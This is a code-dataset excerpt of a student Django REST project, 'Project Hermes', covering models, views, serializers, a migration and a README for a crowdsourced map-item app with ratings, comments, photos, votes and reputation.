"path": "/project_hermes/hermes_config.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "\nclass Configurations:\n AUTO_VERIFICATION_REPUTATION = 500"
},
{
"alpha_fraction": 0.6984924674034119,
"alphanum_fraction": 0.6984924674034119,
"avg_line_length": 26.44827651977539,
"blob_id": "2144800d8fcec458abe686f8dab5297deb877026",
"content_id": "6d0f120c83410ffb372120fdb92117f26cefbc13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 29,
"path": "/item/admin.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom item.models import Item, Comment, Photo, Rating, Reaction\n\n\[email protected](Item)\nclass ItemAdmin(admin.ModelAdmin):\n list_display = ['id', 'title', 'latitude', 'longitude', 'rating', 'author']\n\n\[email protected](Comment)\nclass CommentAdmin(admin.ModelAdmin):\n list_display = ['id', 'comment', 'upvotes', 'downvotes', 'flags', 'author']\n\n\[email protected](Photo)\nclass PhotoAdmin(admin.ModelAdmin):\n list_display = ['id', 'picture', 'upvotes', 'downvotes', 'flags', 'author']\n\n\[email protected](Rating)\nclass RatingAdmin(admin.ModelAdmin):\n list_display = ['id', 'author', 'item', 'rating']\n\n\[email protected](Reaction)\nclass ReactionAdmin(admin.ModelAdmin):\n list_display = ['id', 'author', 'reactable', 'reaction']\n"
},
{
"alpha_fraction": 0.7599067687988281,
"alphanum_fraction": 0.7599067687988281,
"avg_line_length": 32,
"blob_id": "f7667c3d9a60ef2d5f46c4612aad7793623ee417",
"content_id": "8e571d42b620540839174c22788ab0adbb95fe4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 13,
"path": "/account/serializers.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from rest_framework import serializers\n\nfrom account.models import UserProfile\n\n\nclass UserProfileSerializer(serializers.ModelSerializer):\n username = serializers.CharField(source='user.username')\n first_name = serializers.CharField(source='user.first_name')\n last_name = serializers.CharField(source='user.last_name')\n email = serializers.EmailField(source='user.email')\n\n class Meta:\n model = UserProfile\n"
},
{
"alpha_fraction": 0.7886179089546204,
"alphanum_fraction": 0.792682945728302,
"avg_line_length": 45.85714340209961,
"blob_id": "076ab148f10e223c6bff25e1b974688e51eb83d8",
"content_id": "b4fe6bbdc0fe851464f58cdf4ebf3d95f4506f7c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 984,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 21,
"path": "/README.md",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "# Project Hermes\n\nThe project hermes for Imagine Cup, which allows for data collection for map based data\n\n## Setup (Before Installation)\n- Follow all steps mentioned in `INSTALLATION.md`\n- Edit `project_hermes/settings/conf.sample.py` to `project_hermes/settings/conf.py`\n\n## Setting up local machine for development\n- Use Python 3.5\n- Install and configure virtualenvwrapper https://virtualenvwrapper.readthedocs.org/en/latest/\n- In local machine use `pip install -r requirements/local.txt`\n- Edit `project_hermes/settings/conf.py` to your local settings\n\n## Setting up Production server\n- Use Python 3.5\n- Install and configure virtualenvwrapper https://virtualenvwrapper.readthedocs.org/en/latest/\n- In local machine use `pip install -r requirements/production.txt`\n- Edit `project_hermes/settings/conf.py` to add your production level settings\n- Set environment variable `DJANGO_SETTINGS_MODULE` to `project_hermes.settings.production`\n- Continue with Django deployment normally\n"
},
{
"alpha_fraction": 0.5972132682800293,
"alphanum_fraction": 0.6015352606773376,
"avg_line_length": 35.05116271972656,
"blob_id": "86c79c36760d2faf50aa41ba67034d2894ff46a8",
"content_id": "8d2d133bf48c5326345f7e823d1b9174908e75ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15502,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 430,
"path": "/item/views.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import get_object_or_404\n\n# Create your views here.\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import list_route, detail_route\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_400_BAD_REQUEST, HTTP_403_FORBIDDEN\n\nfrom account.models import UserProfile\nfrom item.models import Item, Comment, Reaction, ReactionChoices, Photo, Rating, ItemStatusChoices\nfrom item.serializers import CreateItemSerializer, ItemSerializer, BoundingBoxSerializer, CommentSerializer, \\\n PhotoSerializer, UpdateItemSerializer, AddRatingSerializer, AddCommentSerializer, \\\n AddPhotoSerializer\nfrom project_hermes.hermes_config import Configurations\n\n\ndef get_author(user):\n return UserProfile.objects.filter(user=user).first()\n\ndef recalculate_reputation(profile: UserProfile):\n comments = Comment.objects.filter(author=profile)\n photos = Photo.objects.filter(author=profile)\n reactions = Reaction.objects.filter(author=profile).count()\n\n reputation = 0\n for comment in comments:\n reputation += comment.experience\n for photo in photos:\n reputation += photo.experience\n reputation += reactions\n\n items = Item.objects.filter(author=profile)\n for item in items:\n reputation += item.rating * 2\n reputation -= item.flags * 10\n\n profile.reputation = reputation\n profile.save()\n\nclass ItemViewSet(viewsets.ModelViewSet):\n queryset = Item.objects.all()\n serializer_class = ItemSerializer\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n @staticmethod\n def is_valid_location(latitude, longitude):\n return -90.0 <= latitude <= 90.0 and -180.0 <= longitude <= 180.0\n\n def create(self, request, *args, **kwargs):\n \"\"\"\n create the item\n ---\n request_serializer: CreateItemSerializer\n \"\"\"\n\n serialized_data = CreateItemSerializer(data=request.data)\n if serialized_data.is_valid():\n latitude = serialized_data.validated_data['latitude']\n longitude = serialized_data.validated_data['longitude']\n\n if not self.is_valid_location(latitude, longitude):\n return Response({'success': False, 'message': 'Incorrect Location'}, status=HTTP_400_BAD_REQUEST)\n\n item = Item.objects.filter(author__user=request.user, longitude=longitude, latitude=latitude).first()\n author = get_author(request.user)\n status = ItemStatusChoices.UNVERIFIED if author.reputation < Configurations.AUTO_VERIFICATION_REPUTATION else ItemStatusChoices.VERIFIED\n if not item:\n item = Item.objects.create(\n latitude=latitude,\n longitude=longitude,\n title=serialized_data.validated_data['title'],\n description=serialized_data.validated_data['description'],\n author=author,\n status=status,\n )\n recalculate_reputation(author)\n return Response(self.serializer_class(item).data)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n @list_route(methods=['POST'], permission_classes=[])\n def search_bounding_box(self, request):\n \"\"\"\n Get items by Bounding Box\n ---\n request_serializer: BoundingBoxSerializer\n \"\"\"\n\n serialized_data = BoundingBoxSerializer(data=request.data)\n\n if serialized_data.is_valid():\n min_latitude = serialized_data.validated_data['min_latitude']\n max_latitude = serialized_data.validated_data['max_latitude']\n min_longitude = serialized_data.validated_data['min_longitude']\n max_longitude = serialized_data.validated_data['max_longitude']\n\n items = 
self.get_queryset().filter(latitude__range=[min_latitude, max_latitude],\n longitude__range=[min_longitude, max_longitude])\n response = {\n 'results': self.serializer_class(items, many=True).data\n }\n return Response(response)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n @detail_route(permission_classes=[IsAuthenticated])\n def get_user_comment(self, request, pk):\n item = get_object_or_404(Item, pk=pk)\n comment = Comment.objects.filter(author__user=request.user, item=item).first()\n if comment:\n response = {\n 'success': True,\n 'result': CommentSerializer(comment).data\n }\n return Response(response)\n else:\n return Response({'success': False})\n\n @detail_route()\n def get_comments(self, request, pk):\n item = get_object_or_404(Item, pk=pk)\n comments = item.comments.all()\n response = {\n 'results': CommentSerializer(comments, many=True).data\n }\n return Response(response)\n\n @detail_route()\n def get_photos(self, request, pk):\n item = get_object_or_404(Item, pk=pk)\n photos = item.photos.all()\n response = {\n 'results': PhotoSerializer(photos, many=True).data\n }\n return Response(response)\n\n def update(self, request, *args, **kwargs):\n \"\"\"\n update the item\n ---\n request_serializer: UpdateItemSerializer\n \"\"\"\n\n serialized_data = UpdateItemSerializer(data=request.data)\n item = self.get_object()\n if item.author.user != request.user:\n return Response({'success': False, 'message': 'Unauthorized Access'}, status=HTTP_403_FORBIDDEN)\n\n if serialized_data.is_valid():\n item.title = serialized_data.validated_data['title']\n item.description = serialized_data.validated_data['description']\n item.save()\n recalculate_reputation(item.author)\n return Response(self.serializer_class(item).data)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def add_rating(self, request, pk):\n \"\"\"\n Set rating of the item\n ---\n request_serializer: AddRatingSerializer\n \"\"\"\n\n item = self.get_object()\n serialized_data = AddRatingSerializer(data=request.data)\n if serialized_data.is_valid():\n\n if not (0.0 <= serialized_data.validated_data['rating'] <= 5.0):\n return Response({'success': False, 'message': 'Incorrect Rating'}, status=HTTP_400_BAD_REQUEST)\n\n rating = Rating.objects.filter(item=item, author__user=request.user).first()\n if rating:\n rating.rating = serialized_data.validated_data['rating']\n rating.save()\n\n item.recalculate_rating()\n item.save()\n else:\n rating = Rating.objects.create(\n rating=serialized_data.validated_data['rating'],\n item=item,\n author=get_author(request.user),\n )\n\n item.recalculate_rating()\n item.save()\n recalculate_reputation(rating.author)\n response = {\n 'success': True,\n 'result': self.serializer_class(item).data\n }\n return Response(response)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def add_comment(self, request, pk):\n \"\"\"\n add comment of the item\n ---\n request_serializer: AddCommentSerializer\n \"\"\"\n\n item = self.get_object()\n serialized_data = AddCommentSerializer(data=request.data)\n if serialized_data.is_valid():\n comment = Comment.objects.filter(item=item, author__user=request.user).first()\n if comment:\n comment.description = 
serialized_data.validated_data['description']\n comment.save()\n else:\n comment = Comment.objects.create(\n description=serialized_data.validated_data['description'],\n item=item,\n author=get_author(request.user),\n )\n response = {\n 'success': True,\n 'result': CommentSerializer(comment).data\n }\n recalculate_reputation(comment.author)\n return Response(response)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def add_photo(self, request, pk):\n \"\"\"\n add comment of the item\n ---\n request_serializer: AddPhotoSerializer\n \"\"\"\n\n item = self.get_object()\n serialized_data = AddPhotoSerializer(data=request.data)\n if serialized_data.is_valid():\n photo = Photo.objects.create(\n picture=serialized_data.validated_data['picture'],\n item=item,\n author=get_author(request.user),\n )\n recalculate_reputation(photo.author)\n response = {\n 'success': True,\n 'result': PhotoSerializer(photo).data\n }\n return Response(response)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n\nclass ReactableViewSet(viewsets.ModelViewSet):\n @staticmethod\n def handle_upvote(request, pk, reactable):\n reaction = Reaction.objects.filter(author__user=request.user, reactable=reactable) \\\n .exclude(reaction=ReactionChoices.FLAG).first()\n if reaction:\n reaction.reaction = ReactionChoices.UPVOTE\n reaction.save()\n else:\n Reaction.objects.create(\n reaction=ReactionChoices.UPVOTE,\n reactable=reactable,\n author=get_author(request.user),\n )\n\n reactable.recalculate_votes()\n reactable.recalculate_score()\n reactable.save()\n\n return reactable\n\n @staticmethod\n def handle_downvote(request, pk, reactable):\n reaction = Reaction.objects.filter(author__user=request.user, reactable=reactable) \\\n .exclude(reaction=ReactionChoices.FLAG).first()\n if reaction:\n reaction.reaction = ReactionChoices.DOWNVOTE\n reaction.save()\n\n else:\n Reaction.objects.create(\n reaction=ReactionChoices.DOWNVOTE,\n reactable=reactable,\n author=get_author(request.user),\n )\n\n reactable.recalculate_votes()\n reactable.recalculate_score()\n reactable.save()\n\n return reactable\n\n @staticmethod\n def handle_flag(request, pk, reactable):\n reaction = Reaction.objects.filter(author__user=request.user, reactable=reactable,\n reaction=ReactionChoices.FLAG).first()\n if not reaction:\n Reaction.objects.create(\n reaction=ReactionChoices.FLAG,\n reactable=reactable,\n author=get_author(request.user),\n )\n\n reactable.recalculate_votes()\n reactable.recalculate_score()\n reactable.save()\n\n return reactable\n\n @staticmethod\n def handle_unflag(request, pk, reactable):\n reaction = Reaction.objects.filter(author__user=request.user, reactable=reactable,\n reaction=ReactionChoices.FLAG).first()\n if reaction:\n reaction.delete()\n\n reactable.recalculate_votes()\n reactable.recalculate_score()\n reactable.save()\n\n return reactable\n\n @staticmethod\n def handle_unvote(request, pk, reactable):\n reaction = Reaction.objects.filter(author__user=request.user, reactable=reactable) \\\n .exclude(reaction=ReactionChoices.FLAG).first()\n if reaction:\n reaction.delete()\n\n reactable.recalculate_votes()\n reactable.recalculate_score()\n reactable.save()\n\n return reactable\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def upvote(self, request, pk):\n \"\"\"\n ---\n parameters_strategy:\n form: replace\n 
\"\"\"\n\n reactable = self.handle_upvote(request, pk, self.get_object())\n recalculate_reputation(reactable.author)\n recalculate_reputation(request.user)\n response = {\n 'result': self.serializer_class(reactable).data\n }\n return Response(response)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def downvote(self, request, pk):\n \"\"\"\n ---\n parameters_strategy:\n form: replace\n \"\"\"\n\n reactable = self.handle_downvote(request, pk, self.get_object())\n recalculate_reputation(reactable.author)\n recalculate_reputation(request.user)\n response = {\n 'result': self.serializer_class(reactable).data\n }\n return Response(response)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def flag(self, request, pk):\n \"\"\"\n ---\n parameters_strategy:\n form: replace\n \"\"\"\n\n reactable = self.handle_flag(request, pk, self.get_object())\n recalculate_reputation(reactable.author)\n recalculate_reputation(request.user)\n response = {\n 'result': self.serializer_class(reactable).data\n }\n return Response(response)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def unvote(self, request, pk):\n \"\"\"\n ---\n parameters_strategy:\n form: replace\n \"\"\"\n\n reactable = self.handle_unvote(request, pk, self.get_object())\n recalculate_reputation(reactable.author)\n recalculate_reputation(request.user)\n response = {\n 'result': self.serializer_class(reactable).data\n }\n return Response(response)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def unflag(self, request, pk):\n \"\"\"\n ---\n parameters_strategy:\n form: replace\n \"\"\"\n\n reactable = self.handle_unflag(request, pk, self.get_object())\n recalculate_reputation(reactable.author)\n recalculate_reputation(request.user)\n response = {\n 'result': self.serializer_class(reactable).data\n }\n return Response(response)\n\n\nclass CommentViewSet(ReactableViewSet):\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n\nclass PhotoViewSet(ReactableViewSet):\n queryset = Photo.objects.all()\n serializer_class = PhotoSerializer\n permission_classes = [IsAuthenticatedOrReadOnly]\n"
},
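One semantic note on `search_bounding_box` in the file above: the `latitude__range`/`longitude__range` filters assume `min <= max`, so a box that crosses the ±180° antimeridian matches nothing — the same assumption `BoundingBoxSerializer.validate_values` encodes. A stand-alone check mirroring the filter logic:

```python
def in_box(lat, lon, min_lat, max_lat, min_lon, max_lon):
    # mirrors latitude__range / longitude__range: inclusive, min <= max assumed
    return min_lat <= lat <= max_lat and min_lon <= lon <= max_lon

assert in_box(10.0, 20.0, 0.0, 45.0, 0.0, 45.0)            # ordinary box
assert not in_box(0.0, 175.0, -10.0, 10.0, 170.0, -170.0)  # a box meant to span the antimeridian finds nothing
```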
{
"alpha_fraction": 0.6258357167243958,
"alphanum_fraction": 0.6439828276634216,
"avg_line_length": 29.576642990112305,
"blob_id": "ae85c091195537c565f3f03aacb74593e611dd16",
"content_id": "7b82db36e9deb0f68670edcc34d68cc3d9eec038",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4188,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 137,
"path": "/item/models.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nfrom django.db import models\n\nfrom account.models import UserProfile\n\n\nclass ItemStatusChoices:\n \"\"\"\n Class for the choices in the status field of an Item\n \"\"\"\n\n VERIFIED = 0\n UNVERIFIED = 1\n DELETED = 2\n REMOVED = 3\n\n @classmethod\n def get(cls):\n return [(cls.VERIFIED, 'Verified'),\n (cls.UNVERIFIED, 'Unverified'),\n (cls.DELETED, 'Deleted'),\n (cls.REMOVED, 'Removed')]\n\n\nclass ReactionChoices:\n NONE = 0\n UPVOTE = 1\n DOWNVOTE = 2\n FLAG = 3\n\n @classmethod\n def get(cls):\n return [(cls.NONE, 'None'),\n (cls.UPVOTE, 'Upvote'),\n (cls.DOWNVOTE, 'Downvote'),\n (cls.FLAG, 'Flag')]\n\n\nclass Item(models.Model):\n \"\"\"\n The Location Based Crowd sourced object\n \"\"\"\n\n title = models.TextField(max_length=256, blank=False)\n description = models.TextField(blank=True)\n author = models.ForeignKey(UserProfile)\n rating = models.FloatField(default=0.0)\n latitude = models.FloatField()\n longitude = models.FloatField()\n flags = models.IntegerField(default=0)\n timestamp = models.DateTimeField(auto_now_add=True)\n status = models.IntegerField(choices=ItemStatusChoices.get(), default=ItemStatusChoices.UNVERIFIED)\n\n def recalculate_rating(self):\n self.rating = 0.0\n weight = 0.0\n\n for rating in self.ratings.all():\n rating_weight = 1.0\n # Could be a function of the user : max(0.0, rating.author.reputation)\n\n self.rating += rating.rating * rating_weight\n weight += rating_weight\n\n if weight == 0.0:\n return 0.0\n self.rating /= weight\n\n\nclass Rating(models.Model):\n item = models.ForeignKey(Item, related_name='ratings')\n author = models.ForeignKey(UserProfile)\n rating = models.FloatField(default=0.0)\n\n class Meta:\n unique_together = [['item', 'author']]\n\n\nclass Reactable(models.Model):\n BASE_SCORE = 10.0\n\n upvotes = models.IntegerField(default=0)\n downvotes = models.IntegerField(default=0)\n flags = models.IntegerField(default=0)\n timestamp = models.DateTimeField(auto_now_add=True)\n experience = models.FloatField(default=0)\n\n @staticmethod\n def convert_to_score(count, scale, values=(1, 10, 50, 200, 1000), scores=(1, 2, 4, 8, 16)):\n for index in reversed(range(len(values))):\n if values[index] < count:\n return scores[index]\n\n return 0.0\n\n def recalculate_score(self):\n return self.BASE_SCORE - self.convert_to_score(self.flags, 50, values=(0, 4, 8, 16, 32)) \\\n - self.convert_to_score(self.downvotes, 20, values=(0, 5, 10, 20, 50)) \\\n + self.convert_to_score(self.upvotes, 10)\n\n def recalculate_votes(self):\n self.upvotes = Reaction.objects.filter(reactable=self, reaction=ReactionChoices.UPVOTE).count()\n self.downvotes = Reaction.objects.filter(reactable=self, reaction=ReactionChoices.DOWNVOTE).count()\n self.flags = Reaction.objects.filter(reactable=self, reaction=ReactionChoices.FLAG).count()\n\n\nclass Reaction(models.Model):\n reaction = models.IntegerField(choices=ReactionChoices.get(), default=ReactionChoices.NONE)\n reactable = models.ForeignKey(Reactable, related_name='reactions')\n author = models.ForeignKey(UserProfile)\n timestamp = models.DateTimeField(auto_now_add=True)\n\n\nclass Comment(Reactable):\n item = models.ForeignKey(Item, related_name='comments')\n author = models.ForeignKey(UserProfile)\n description = models.TextField()\n\n class Meta:\n unique_together = [['item', 'author']]\n\n def recalculate_score(self):\n score = super().recalculate_score()\n self.author.reputation += (score - self.experience)\n self.experience = score\n\n\nclass 
Photo(Reactable):\n item = models.ForeignKey(Item, related_name='photos')\n author = models.ForeignKey(UserProfile)\n picture = models.ImageField()\n\n def recalculate_score(self):\n score = super().recalculate_score()\n self.author.reputation += (score - self.experience)\n self.experience = score"
},
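`Reactable.convert_to_score` above is a step function over vote counts (its `scale` parameter is currently unused). The thresholds are easiest to see by direct evaluation — a copy of the logic with the defaults inlined and `scale` dropped:

```python
def convert_to_score(count, values=(1, 10, 50, 200, 1000), scores=(1, 2, 4, 8, 16)):
    for index in reversed(range(len(values))):
        if values[index] < count:
            return scores[index]
    return 0.0

assert convert_to_score(0) == 0.0     # below every threshold
assert convert_to_score(2) == 1       # strictly past the first threshold (1 < 2)
assert convert_to_score(1001) == 16   # past the last threshold
```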
{
"alpha_fraction": 0.560272753238678,
"alphanum_fraction": 0.5692917108535767,
"avg_line_length": 47.36170196533203,
"blob_id": "02f95a5610c58d37d425a31742056fd822e6357c",
"content_id": "936967d6a530f77a069604cc410ead51128be2ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4546,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 94,
"path": "/item/migrations/0001_initial.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.4 on 2016-04-07 12:42\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('account', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Item',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.TextField(max_length=256)),\n ('description', models.TextField(blank=True)),\n ('rating', models.FloatField(default=0.0)),\n ('latitude', models.FloatField()),\n ('longitude', models.FloatField()),\n ('flags', models.IntegerField(default=0)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('status', models.IntegerField(choices=[(0, 'Verified'), (1, 'Unverified'), (2, 'Deleted'), (3, 'Removed')], default=1)),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.UserProfile')),\n ],\n ),\n migrations.CreateModel(\n name='Rating',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('rating', models.FloatField(default=0.0)),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.UserProfile')),\n ('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ratings', to='item.Item')),\n ],\n ),\n migrations.CreateModel(\n name='Reactable',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('upvotes', models.IntegerField(default=0)),\n ('downvotes', models.IntegerField(default=0)),\n ('flags', models.IntegerField(default=0)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Reaction',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('reaction', models.IntegerField(choices=[(0, 'None'), (1, 'Like'), (2, 'Dislike'), (3, 'Flag')], default=0)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.UserProfile')),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('reactable_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='item.Reactable')),\n ('description', models.TextField()),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.UserProfile')),\n ('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='item.Item')),\n ],\n bases=('item.reactable',),\n ),\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('reactable_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='item.Reactable')),\n ('picture', models.ImageField(upload_to='')),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.UserProfile')),\n ('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='photos', to='item.Item')),\n ],\n bases=('item.reactable',),\n ),\n migrations.AddField(\n model_name='reaction',\n name='reactable',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='item.Reactable'),\n ),\n 
migrations.AlterUniqueTogether(\n name='rating',\n unique_together=set([('item', 'author')]),\n ),\n migrations.AlterUniqueTogether(\n name='comment',\n unique_together=set([('item', 'author')]),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7534659504890442,
"alphanum_fraction": 0.7534659504890442,
"avg_line_length": 24.121212005615234,
"blob_id": "a23b15f14dddc19bf0ef0bd88eab681a5bc48c52",
"content_id": "f4a7c38b7ee3b2049e93e64963381d405a486c1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1659,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 66,
"path": "/item/serializers.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from rest_framework import serializers\n\nfrom account.serializers import UserProfileSerializer\nfrom item.models import Item, Comment, Photo, Rating\n\n\nclass ItemSerializer(serializers.ModelSerializer):\n author = UserProfileSerializer()\n\n class Meta:\n model = Item\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n author = UserProfileSerializer()\n\n class Meta:\n model = Comment\n\n\nclass PhotoSerializer(serializers.ModelSerializer):\n author = UserProfileSerializer()\n\n class Meta:\n model = Photo\n\n\nclass RatingSerializer(serializers.ModelSerializer):\n author = UserProfileSerializer()\n\n class Meta:\n model = Rating\n\n\nclass CreateItemSerializer(serializers.Serializer):\n title = serializers.CharField()\n description = serializers.CharField()\n latitude = serializers.FloatField()\n longitude = serializers.FloatField()\n\n\nclass UpdateItemSerializer(serializers.Serializer):\n title = serializers.CharField()\n description = serializers.CharField()\n\n\nclass AddRatingSerializer(serializers.Serializer):\n rating = serializers.FloatField()\n\n\nclass AddCommentSerializer(serializers.Serializer):\n description = serializers.CharField()\n\n\nclass AddPhotoSerializer(serializers.Serializer):\n picture = serializers.ImageField()\n\n\nclass BoundingBoxSerializer(serializers.Serializer):\n min_latitude = serializers.FloatField()\n max_latitude = serializers.FloatField()\n min_longitude = serializers.FloatField()\n max_longitude = serializers.FloatField()\n\n def validate_values(self):\n return self.min_latitude <= self.max_latitude and self.min_longitude <= self.max_longitude\n\n"
},
{
"alpha_fraction": 0.6416819095611572,
"alphanum_fraction": 0.645338237285614,
"avg_line_length": 27.05128288269043,
"blob_id": "a51cebebf1d12eb5d8f41716b8d80483830be42c",
"content_id": "2183027c0b2295652fb59b3362051db3e4b61a58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1094,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 39,
"path": "/account/models.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nimport uuid\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils import timezone\n\n\nclass UserProfile(models.Model):\n user = models.ForeignKey(User)\n reputation = models.FloatField(default=0)\n\n def __str__(self):\n return self.user.first_name + '[' + self.user.email + ']'\n\n\nclass UserToken(models.Model):\n user = models.ForeignKey(User)\n token = models.UUIDField(default=uuid.uuid4, editable=False, db_index=True, unique=True)\n created = models.DateTimeField(auto_now_add=True)\n last_accessed = models.DateTimeField(default=timezone.now)\n has_expired = models.BooleanField(default=False)\n\n def is_active(self):\n if self.has_expired:\n return False\n\n current_date = timezone.now()\n diff = abs((current_date - self.last_accessed).days)\n\n if diff > 30:\n self.has_expired = True\n self.save()\n return False\n else:\n self.last_accessed = current_date\n self.save()\n return True\n"
},
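`UserToken.is_active` above implements a 30-day sliding expiry; the date arithmetic can be exercised without Django by isolating it (a pure-Python restatement for illustration, not the model's actual method):

```python
from datetime import datetime, timedelta, timezone

def token_active(last_accessed, now):
    # mirrors is_active: expired once more than 30 days have passed
    return abs((now - last_accessed).days) <= 30

now = datetime.now(timezone.utc)
assert token_active(now - timedelta(days=29), now)
assert not token_active(now - timedelta(days=31), now)
```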
{
"alpha_fraction": 0.7668161392211914,
"alphanum_fraction": 0.7668161392211914,
"avg_line_length": 23.77777862548828,
"blob_id": "96d3394ebde2cc2c9c0beb87d7d6cac4ff4d923a",
"content_id": "846714c150f0986f7c6d34e513b378f35f293633",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 223,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 9,
"path": "/account/admin.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom account.models import UserProfile\n\n\[email protected](UserProfile)\nclass UserProfileAdmin(admin.ModelAdmin):\n list_display = ['id', 'user', 'reputation']\n"
}
] | 10 |
Sompus/Hand-tracker- | https://github.com/Sompus/Hand-tracker- | 618490b4d7cdcaa1d0c453288194b86d37b31ef1 | 9aa1e6286228b0b8e201befa98a3a601aa6f7bc8 | 014e1ef1b98d379fda32987a67da8382f3728333 | refs/heads/main | 2023-07-13T13:25:35.992095 | 2021-08-02T08:43:01 | 2021-08-02T08:43:01 | 391,870,853 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4725091755390167,
"alphanum_fraction": 0.49916693568229675,
"avg_line_length": 32.4942512512207,
"blob_id": "30d246d07ace1a1cbea44d2d11c130adddac5930",
"content_id": "039989317bb928f10843723bcdf6f460c5089eab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3001,
"license_type": "no_license",
"max_line_length": 210,
"num_lines": 87,
"path": "/Basics.py",
